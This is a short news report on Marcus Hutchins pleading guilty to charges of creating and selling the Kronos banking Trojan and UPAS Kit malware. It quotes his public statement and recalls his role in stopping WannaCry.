According to Wisconsin court documents, Hutchins was charged in "10 counts of a superseding indictment." He pleaded guilty to counts one and two, saying that the US government would be able to prove that "between July 2012 and September 2016, [he] helped create and, in partnership with another, sell malicious computer code, aka malware, known as UPAS-Kit and Kronos."

Arrested in August 2017 at the Las Vegas airport by the FBI, Hutchins was accused of creating and spreading the banking Trojan Kronos, followed by additional charges in June 2018 relating to developing and distributing UPAS Kit, a "modular HTTP bot" designed to install on victims’ machines without alerting AV tools. He denied the former in 2017, making this a complete turnaround on his previous plea.

Kronos targeted banking information and was valued at $7,000 on the dark web

Hutchins made a public statement in response to reports of his plea: "As you may be aware, I’ve pleaded guilty to two charges related to writing malware in the years prior to my career in security. I regret these actions and accept full responsibility for my mistakes. Having grown up, I’ve since been using the same skills that I misused several years ago for constructive purposes. I will continue to devote my time to keeping people safe from malware attacks."

The WannaCry attacks took place in May 2017, with Telefonica being the first victim. The attacks happened worldwide, including the UK's National Health Service (NHS), and impacted more than 150 countries. Hutchins created a kill switch, which helped organizations globally stop the ransomware. He won an award for his contribution, as many cited the impact would have been worse without it. 

According to the Wisconsin court documents, Hutchins could face up to six years in prison and a $250,000 fine.

Categories: Cyber Risk News

Pages